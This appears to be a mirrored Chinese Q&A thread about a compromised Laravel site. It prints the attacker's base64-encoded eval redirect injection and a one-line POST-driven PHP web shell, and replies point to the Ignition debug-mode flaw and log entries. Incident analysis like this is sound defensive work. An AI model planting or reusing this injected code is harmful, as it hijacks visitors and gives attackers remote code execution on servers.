Fatal编程技术网
  • php/
  • Php 关于恶意代码aeR4Choc注入的安全漏洞的问题

Php 关于恶意代码aeR4Choc注入的安全漏洞的问题

php laravel nginx

Php 关于恶意代码aeR4Choc注入的安全漏洞的问题,php,laravel,nginx,Php,Laravel,Nginx,我有一个运行laravel8和livewire php7.4的家庭Web服务器 今天我在检查服务器上的源代码时遇到了重定向攻击,我发现我的源代码有以下两个更改 public/index.php /*aeR4Choc_start*/@eval(base64_decode('aWYoIWRlZmluZWQoImNoYWVKb3U3IikpewogICAgZGVmaW5lKCJjaGFlSm91NyIsIDEpOwogICAgZnVuY3Rpb24gaXNNb2JpbGUoJHVhZ2VudFN0ci

我有一个运行laravel8和livewire php7.4的家庭Web服务器 今天我在检查服务器上的源代码时遇到了重定向攻击,我发现我的源代码有以下两个更改

public/index.php

/*aeR4Choc_start*/@eval(base64_decode('aWYoIWRlZmluZWQoImNoYWVKb3U3IikpewogICAgZGVmaW5lKCJjaGFlSm91NyIsIDEpOwogICAgZnVuY3Rpb24gaXNNb2JpbGUoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdhbmRyb2lkJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnYmxhY2tiZXJyeScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwaG9uZScpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwYWQnKSAhPT0gZmFsc2UKICAgICAgICAgICAgfHwgc3RycG9zKCR1YWdlbnRTdHIsICdpcG9kJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnb3BlcmEgbWluaScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2llTW9iaWxlJykgIT09IGZhbHNlKXsKICAgICAgICAgICAgcmV0dXJuIHRydWU7CiAgICAgICAgfQogICAgICAgIHJldHVybiBmYWxzZTsKICAgIH0KCiAgICBmdW5jdGlvbiBpc0Rlc2t0b3AoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdlZGdlJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnbXNpZScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ29wcicpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9taXVtJykgIT09IGZhbHNlCiAgICAgICAgICAgIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnZmlyZWZveCcpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9tZScpICE9PSBmYWxzZSl7CiAgICAgICAgICAgIHJldHVybiB0cnVlOwogICAgICAgIH0KICAgICAgICByZXR1cm4gZmFsc2U7CiAgICB9CgogICAgJHJlZGlyVG8gPSAiaHR0cHM6Ly93d3cucm94b2Vub3MueHl6LyI7CiAgICAkY2hlY2tDb29rUmVkaXJTdHIgPSAiYWVOZWU4cGkiOwogICAgJHJlZGlyZWN0QWxsb3cgPSB0cnVlOwogICAgZm9yZWFjaCAoJF9DT09LSUUgYXMgJGNvb2tLZXk9PiRjb29rVmFsKXsKICAgICAgICBpZiAoc3RycG9zKCRjb29rS2V5LCAnd29yZHByZXNzX2xvZ2dlZF9pbicpICE9PSBmYWxzZSB8fCAkY29va0tleSA9PSAkY2hlY2tDb29rUmVkaXJTdHIpIHsKICAgICAgICAgICAgJHJlZGlyZWN0QWxsb3cgPSBmYWxzZTsKICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQogICAgfQoKICAgICR1YWdlbnQgPSBzdHJ0b2xvd2VyKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7CgogICAgaWYgKCRyZWRpcmVjdEFsbG93KXsKICAgICAgICBpZihpc01vYmlsZSgkdWFnZW50KSB8fCBpc0Rlc2t0b3AoJHVhZ2VudCkpIHsKICAgICAgICAgICAgc2V0Y29va2llKCRjaGVja0Nvb2tSZWRpclN0ciwgIjEiLCB0aW1lKCkgKyA2MDQ4MDApOwogICAgICAgICAgICBoZWFkZXIoIkxvY2F0aW9uOiAkcmVkaXJUbyIpOwogICAgICAgICAgICBkaWU7CiAgICAgICAgfQogICAgfQp9'));/*aeR4Choc_end*/
public/wJr2TTgX.php

<?php
// do not delete this file!
define("LaravelLicense", "193582933013");
extract($_POST);$c($f, $a);include $f;

部分解决方案与更新您的laravel有关

今天我无意中发现我的系统被感染了,原因是GoogleAds警告我的网站有病毒

因此,您可以查看访问日志中的以下行:


POST /_ignition/execute-solution


…您将看到下面几行您将看到另一篇帖子:


POST /wJr2TTgX.php HTTP / 1.1 "200 43


要查看完整的说明,请点击此链接:




编辑:您始终可以编辑您向世界公开的内容的
.env
文件,并将其置于生产模式。该漏洞仅在调试模式下出现。
公用文件夹首先不应是可写的,因此权限问题至少可以解决。谢谢你,我刚刚解决了这个问题,但是还有其他最可能的事情吗?但是我们无法告诉你,你应该开始查看一些日志,看看是否看到一些奇怪的东西。。有很多都取决于环境和情况如何,你有没有找到问题的根源?建议使用折衷的composer软件包…我认为laravel 8.12已经在composer create项目中修复了此问题,但现在我重新检查了它,它仍然使用ignition 2.5.1,谢谢。我将此标记为答案。您可以随时编辑您向世界公开的.env文件,并将其置于生产模式。该漏洞仅在调试模式下出现。非常感谢您的链接!它帮助我解决了加密机器人miner
kdevtmpfsi
kinsing
的问题。